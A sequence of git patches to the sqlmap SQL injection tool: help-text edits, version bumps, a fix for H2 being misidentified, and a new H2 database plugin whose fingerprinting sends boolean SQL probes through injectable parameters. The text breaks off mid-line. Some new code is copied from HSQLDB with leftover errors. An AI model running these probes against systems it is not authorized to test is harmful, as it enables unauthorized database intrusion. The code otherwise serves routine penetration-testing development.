index 263d5bfe0df..b1b8466fab8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.18" +VERSION = "1.2.10.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 8cc577e66c1..2c867b88e35 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -99,16 +99,16 @@ def cmdLineParser(argv=None): help="Force usage of given HTTP method (e.g. PUT)") request.add_option("--data", dest="data", - help="Data string to be sent through POST") + help="Data string to be sent through POST (e.g. \"id=1\")") request.add_option("--param-del", dest="paramDel", - help="Character used for splitting parameter values") + help="Character used for splitting parameter values (e.g. &)") request.add_option("--cookie", dest="cookie", - help="HTTP Cookie header value") + help="HTTP Cookie header value (e.g. \"PHPSESSID=a8d127e..\")") request.add_option("--cookie-del", dest="cookieDel", - help="Character used for splitting cookie values") + help="Character used for splitting cookie values (e.g. ;)") request.add_option("--load-cookies", dest="loadCookies", help="File containing cookies in Netscape/wget format") @@ -144,7 +144,7 @@ def cmdLineParser(argv=None): help="HTTP authentication PEM cert/private key file") request.add_option("--ignore-code", dest="ignoreCode", type="int", - help="Ignore HTTP error code (e.g. 401)") + help="Ignore (problematic) HTTP error code (e.g. 401)") request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", help="Ignore system default proxy settings") @@ -617,7 +617,7 @@ def cmdLineParser(argv=None): help="Run host OS command(s) when SQL injection is found") miscellaneous.add_option("--answers", dest="answers", - help="Set question answers (e.g. \"quit=N,follow=N\")") + help="Set predefined answers (e.g. \"quit=N,follow=N\")") miscellaneous.add_option("--beep", dest="beep", action="store_true", help="Beep on question and/or when SQL injection is found") diff --git a/sqlmap.conf b/sqlmap.conf index dcbe92af381..5dfc3d72d01 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -43,16 +43,16 @@ sitemapUrl = # Force usage of given HTTP method (e.g. PUT). method = -# Data string to be sent through POST. +# Data string to be sent through POST (e.g. "id=1"). data = -# Character used for splitting parameter values. +# Character used for splitting parameter values (e.g. &). paramDel = -# HTTP Cookie header value. +# HTTP Cookie header value (e.g. "PHPSESSID=a8d127e.."). cookie = -# Character used for splitting cookie values. +# Character used for splitting cookie values (e.g. ;). cookieDel = # File containing cookies in Netscape/wget format. @@ -98,7 +98,7 @@ authCred = # Syntax: key_file authFile = -# Ignore HTTP error code (e.g. 401). +# Ignore (problematic) HTTP error code (e.g. 401). # Valid: integer ignoreCode = @@ -746,7 +746,7 @@ updateAll = False # Run host OS command(s) when SQL injection is found. alert = -# Set question answers (e.g. "quit=N,follow=N"). +# Set predefined answers (e.g. "quit=N,follow=N"). answers = # Beep on question and/or when SQL injection is found. diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a7c7b5f06e8..8fd0e053a8b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fb1892f8a3902907dcd6c75f58dd80c1 lib/core/settings.py +e8b8aa7f54d6b6b57b34f933063c128f lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -60,7 +60,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -6458f20d6ebe20fb45a79a09c2874d33 lib/parse/cmdline.py +30d7cbada42154dcbb17f4ca969d812a lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From fb95ab8c170c1094320e81ba949ea3127d725efc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Oct 2018 08:02:38 +0200 Subject: [PATCH 325/428] Initial commit for #3283 (fixing H2 misidentification with PgSQL and/or HSQLDB) --- lib/core/settings.py | 2 +- plugins/dbms/hsqldb/fingerprint.py | 7 +++++++ plugins/dbms/postgresql/fingerprint.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 12 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b1b8466fab8..fd209742c2e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.19" +VERSION = "1.2.10.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py index fcad249f917..4fecfa648af 100644 --- a/plugins/dbms/hsqldb/fingerprint.py +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -106,6 +106,13 @@ def checkDbms(self): return False else: + result = inject.checkBooleanExpression("ZERO() IS 0") # Note: check for H2 DBMS (sharing majority of same functions) + if result: + warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB + logger.warn(warnMsg) + + return False + kb.data.has_information_schema = True Backend.setVersion(">= 1.7.2") setDbms("%s 1.7.2" % DBMS.HSQLDB) diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index 5860b820906..a4060687242 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -73,7 +73,7 @@ def checkDbms(self): infoMsg = "testing %s" % DBMS.PGSQL logger.info(infoMsg) - result = inject.checkBooleanExpression("[RANDNUM]::int=[RANDNUM]") + result = inject.checkBooleanExpression("QUOTE_IDENT(NULL) IS NULL") if result: infoMsg = "confirming %s" % DBMS.PGSQL diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8fd0e053a8b..53ef4b474e0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e8b8aa7f54d6b6b57b34f933063c128f lib/core/settings.py +deced6d285dcd850e4e7d8e478527729 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -143,7 +143,7 @@ c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py -aabc2b877a3696b99912bdf362c0fb69 plugins/dbms/hsqldb/fingerprint.py +b061bdbb9159c449072fde51b444f1c0 plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py @@ -186,7 +186,7 @@ bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py 7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py -c490b23b19e40e15cfbdbb026386bbd7 plugins/dbms/postgresql/fingerprint.py +1449c89fa6dac9b62e814cc65233b9de plugins/dbms/postgresql/fingerprint.py 470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py 20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py From 411f56e71071a200ebde76adcd45455b348d91e4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Oct 2018 12:23:07 +0200 Subject: [PATCH 326/428] Initial implementation for #3283 --- lib/controller/checks.py | 5 +- lib/controller/handler.py | 4 ++ lib/core/agent.py | 6 +- lib/core/common.py | 4 +- lib/core/dicts.py | 2 + lib/core/enums.py | 2 + lib/core/settings.py | 9 ++- plugins/dbms/h2/__init__.py | 33 +++++++++ plugins/dbms/h2/connector.py | 91 ++++++++++++++++++++++++ plugins/dbms/h2/enumeration.py | 42 ++++++++++++ plugins/dbms/h2/filesystem.py | 21 ++++++ plugins/dbms/h2/fingerprint.py | 122 +++++++++++++++++++++++++++++++++ plugins/dbms/h2/syntax.py | 24 +++++++ plugins/dbms/h2/takeover.py | 31 +++++++++ plugins/generic/databases.py | 8 +-- plugins/generic/entries.py | 8 +-- txt/checksum.md5 | 27 +++++--- xml/queries.xml | 68 ++++++++++++++++++ 18 files changed, 480 insertions(+), 27 deletions(-) create mode 100644 plugins/dbms/h2/__init__.py create mode 100644 plugins/dbms/h2/connector.py create mode 100644 plugins/dbms/h2/enumeration.py create mode 100644 plugins/dbms/h2/filesystem.py create mode 100644 plugins/dbms/h2/fingerprint.py create mode 100644 plugins/dbms/h2/syntax.py create mode 100644 plugins/dbms/h2/takeover.py diff --git a/lib/controller/checks.py b/lib/controller/checks.py index fac6027e456..4ef33249b3c 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -89,6 +89,7 @@ from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH from lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS +from lib.core.settings import SINGLE_QUOTE_MARKER from lib.core.settings import SLEEP_TIME_MARKER from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import SUPPORTED_DBMS @@ -859,8 +860,8 @@ def heuristicCheckDbms(injection): if conf.noEscape and dbms not in FROM_DUMMY_TABLE: continue - if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)): - if not checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr2)): + if checkBooleanExpression("(SELECT '%s'%s)=%s%s%s" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), SINGLE_QUOTE_MARKER, randStr1, SINGLE_QUOTE_MARKER)): + if not checkBooleanExpression("(SELECT '%s'%s)=%s%s%s" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), SINGLE_QUOTE_MARKER, randStr2, SINGLE_QUOTE_MARKER)): retVal = dbms break diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 6ce752dd28e..9dab40488e6 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -21,6 +21,7 @@ from lib.core.settings import SYBASE_ALIASES from lib.core.settings import DB2_ALIASES from lib.core.settings import HSQLDB_ALIASES +from lib.core.settings import H2_ALIASES from lib.core.settings import INFORMIX_ALIASES from lib.utils.sqlalchemy import SQLAlchemy @@ -46,6 +47,8 @@ from plugins.dbms.db2.connector import Connector as DB2Conn from plugins.dbms.hsqldb import HSQLDBMap from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn +from plugins.dbms.h2 import H2Map +from plugins.dbms.h2.connector import Connector as H2Conn from plugins.dbms.informix import InformixMap from plugins.dbms.informix.connector import Connector as InformixConn @@ -67,6 +70,7 @@ def setHandler(): (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn), (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn), (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn), + (DBMS.H2, H2_ALIASES, H2Map, H2Conn), (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn), ] diff --git a/lib/core/agent.py b/lib/core/agent.py index 423f66bd7bb..10ee4cfdde9 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -43,6 +43,7 @@ from lib.core.settings import NULL from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import REPLACEMENT_MARKER +from lib.core.settings import SINGLE_QUOTE_MARKER from lib.core.settings import SLEEP_TIME_MARKER from lib.core.unescaper import unescaper @@ -348,6 +349,7 @@ def adjustLateValues(self, payload): if payload: payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec)) + payload = payload.replace(SINGLE_QUOTE_MARKER, "'") for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)): payload = payload.replace(_, str(randomInt())) @@ -821,7 +823,7 @@ def limitCondition(self, expression, dump=False): limitRegExp2 = None if (limitRegExp or limitRegExp2) or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2): limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query @@ -911,7 +913,7 @@ def limitQuery(self, num, query, field=None, uniqueField=None): fromFrom = limitedQuery[fromIndex + 1:] orderBy = None - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) limitedQuery += " %s" % limitStr diff --git a/lib/core/common.py b/lib/core/common.py index 17574782212..da760545802 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3649,7 +3649,7 @@ def safeSQLIdentificatorNaming(name, isTable=False): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS): retVal = "`%s`" % retVal - elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.SQLITE, DBMS.INFORMIX, DBMS.HSQLDB): + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.SQLITE, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX): retVal = "\"%s\"" % retVal elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,): retVal = "\"%s\"" % retVal.upper() @@ -4275,7 +4275,7 @@ def _(value): retVal = retVal.decode("utf-16-le") except UnicodeDecodeError: pass - elif Backend.isDbms(DBMS.HSQLDB): + elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.H2): try: retVal = retVal.decode("utf-16-be") except UnicodeDecodeError: diff --git a/lib/core/dicts.py b/lib/core/dicts.py index b291aeff947..5cfb8633c75 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -22,6 +22,7 @@ from lib.core.settings import SYBASE_ALIASES from lib.core.settings import DB2_ALIASES from lib.core.settings import HSQLDB_ALIASES +from lib.core.settings import H2_ALIASES from lib.core.settings import INFORMIX_ALIASES FIREBIRD_TYPES = { @@ -195,6 +196,7 @@ DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"), DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None), + DBMS.H2: (H2_ALIASES, None, None), DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), } diff --git a/lib/core/enums.py b/lib/core/enums.py index ab21db6bdde..181cae66c17 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -43,6 +43,7 @@ class DBMS: SQLITE = "SQLite" SYBASE = "Sybase" HSQLDB = "HSQLDB" + H2 = "H2" INFORMIX = "Informix" class DBMS_DIRECTORY_NAME: @@ -57,6 +58,7 @@ class DBMS_DIRECTORY_NAME: SQLITE = "sqlite" SYBASE = "sybase" HSQLDB = "hsqldb" + H2 = "h2" INFORMIX = "informix" class CUSTOM_LOGGING: diff --git a/lib/core/settings.py b/lib/core/settings.py index fd209742c2e..e99c4a3269a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.20" +VERSION = "1.2.10.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -71,6 +71,7 @@ RANDOM_STRING_MARKER = "[RANDSTR]" SLEEP_TIME_MARKER = "[SLEEPTIME]" INFERENCE_MARKER = "[INFERENCE]" +SINGLE_QUOTE_MARKER = "[SINGLE_QUOTE]" PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__" CHAR_INFERENCE_MARK = "%c" @@ -236,6 +237,7 @@ SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs") DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS", "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB") +H2_SYSTEM_DBS = ("INFORMATION_SCHEMA") INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin") MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") @@ -249,14 +251,15 @@ SYBASE_ALIASES = ("sybase", "sybase sql server") DB2_ALIASES = ("db2", "ibm db2", "ibmdb2") HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql") +H2_ALIASES = ("h2",) INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix") DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) -SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + INFORMIX_ALIASES +SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES SUPPORTED_OS = ("linux", "windows") -DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES)) +DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES)) USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") REFERER_ALIASES = ("ref", "referer", "referrer") diff --git a/plugins/dbms/h2/__init__.py b/plugins/dbms/h2/__init__.py new file mode 100644 index 00000000000..c35662f6051 --- /dev/null +++ b/plugins/dbms/h2/__init__.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import H2_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.h2.enumeration import Enumeration +from plugins.dbms.h2.filesystem import Filesystem +from plugins.dbms.h2.fingerprint import Fingerprint +from plugins.dbms.h2.syntax import Syntax +from plugins.dbms.h2.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class H2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines H2 methods + """ + + def __init__(self): + self.excludeDbsList = H2_SYSTEM_DBS + + Syntax.__init__(self) + Fingerprint.__init__(self) + Enumeration.__init__(self) + Filesystem.__init__(self) + Miscellaneous.__init__(self) + Takeover.__init__(self) + + unescaper[DBMS.H2] = Syntax.escape diff --git a/plugins/dbms/h2/connector.py b/plugins/dbms/h2/connector.py new file mode 100644 index 00000000000..ee605409f27 --- /dev/null +++ b/plugins/dbms/h2/connector.py @@ -0,0 +1,91 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +try: + import jaydebeapi + import jpype +except: + pass + +import logging + +from lib.core.common import checkFile +from lib.core.common import readInput +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/ + User guide: https://pypi.python.org/pypi/JayDeBeApi/#usage & http://jpype.sourceforge.net/doc/user-guide/userguide.html + API: - + Debian package: - + License: LGPL & Apache License 2.0 + """ + + def __init__(self): + GenericConnector.__init__(self) + + def connect(self): + self.initConnection() + try: + msg = "what's the location of 'hsqldb.jar'? " + jar = readInput(msg) + checkFile(jar) + args = "-Djava.class.path=%s" % jar + jvm_path = jpype.getDefaultJVMPath() + jpype.startJVM(jvm_path, args) + except Exception, msg: + raise SqlmapConnectionException(msg[0]) + + try: + driver = 'org.hsqldb.jdbc.JDBCDriver' + connection_string = 'jdbc:hsqldb:mem:.' # 'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db) + self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password)) + except Exception, msg: + raise SqlmapConnectionException(msg[0]) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except Exception, msg: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + return None + + def execute(self, query): + retVal = False + + try: + self.cursor.execute(query) + retVal = True + except Exception, msg: # TODO: fix with specific error + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + + self.connector.commit() + + return retVal + + def select(self, query): + retVal = None + + upper_query = query.upper() + + if query and not (upper_query.startswith("SELECT ") or upper_query.startswith("VALUES ")): + query = "VALUES %s" % query + + if query and upper_query.startswith("SELECT ") and " FROM " not in upper_query: + query = "%s FROM (VALUES(0))" % query + + self.cursor.execute(query) + retVal = self.cursor.fetchall() + + return retVal diff --git a/plugins/dbms/h2/enumeration.py b/plugins/dbms/h2/enumeration.py new file mode 100644 index 00000000000..2035d6f25a9 --- /dev/null +++ b/plugins/dbms/h2/enumeration.py @@ -0,0 +1,42 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.enumeration import Enumeration as GenericEnumeration +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import queries +from lib.core.common import unArrayizeValue +from lib.core.enums import DBMS +from lib.request import inject + +class Enumeration(GenericEnumeration): + def __init__(self): + GenericEnumeration.__init__(self) + + def getBanner(self): + if not conf.getBanner: + return + + if kb.data.banner is None: + infoMsg = "fetching banner" + logger.info(infoMsg) + + query = queries[DBMS.H2].banner.query + kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True)) + + return kb.data.banner + + def getPrivileges(self, *args): + warnMsg = "on H2 it is not possible to enumerate the user privileges" + logger.warn(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on H2 it is not possible to enumerate the hostname" + logger.warn(warnMsg) diff --git a/plugins/dbms/h2/filesystem.py b/plugins/dbms/h2/filesystem.py new file mode 100644 index 00000000000..7542ffb60cd --- /dev/null +++ b/plugins/dbms/h2/filesystem.py @@ -0,0 +1,21 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def __init__(self): + GenericFilesystem.__init__(self) + + def readFile(self, rFile): + errMsg = "on H2 it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): + errMsg = "on H2 it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/h2/fingerprint.py b/plugins/dbms/h2/fingerprint.py new file mode 100644 index 00000000000..d11313aff81 --- /dev/null +++ b/plugins/dbms/h2/fingerprint.py @@ -0,0 +1,122 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.common import unArrayizeValue +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import H2_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.H2) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp and not conf.api: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp and not conf.api: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + actVer = Format.getDbms() + + if not conf.extensiveFp: + value += actVer + return value + + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if re.search(r"-log$", kb.data.banner): + banVer += ", logging enabled" + + banVer = Format.getDbms([banVer] if banVer else None) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(H2_ALIASES): + setDbms("%s %s" % (DBMS.H2, Backend.getVersion())) + + if Backend.isVersionGreaterOrEqualThan("1.7.2"): + kb.data.has_information_schema = True + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.H2 + logger.info(infoMsg) + + result = inject.checkBooleanExpression("ZERO() IS 0") + + if result: + infoMsg = "confirming %s" % DBMS.H2 + logger.info(infoMsg) + + result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.H2 + logger.warn(warnMsg) + + return False + else: + kb.data.has_information_schema = True + Backend.setVersion(">= 1.7.2") + setDbms("%s 1.7.2" % DBMS.H2) + + banner = self.getBanner() + if banner: + Backend.setVersion("= %s" % banner) + else: + if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"): + Backend.setVersionList([">= 2.0.0", "< 2.3.0"]) + else: + banner = unArrayizeValue(inject.getValue("\"org.hsqldbdb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True)) + if banner: + Backend.setVersion("= %s" % banner) + else: + Backend.setVersionList([">= 1.7.2", 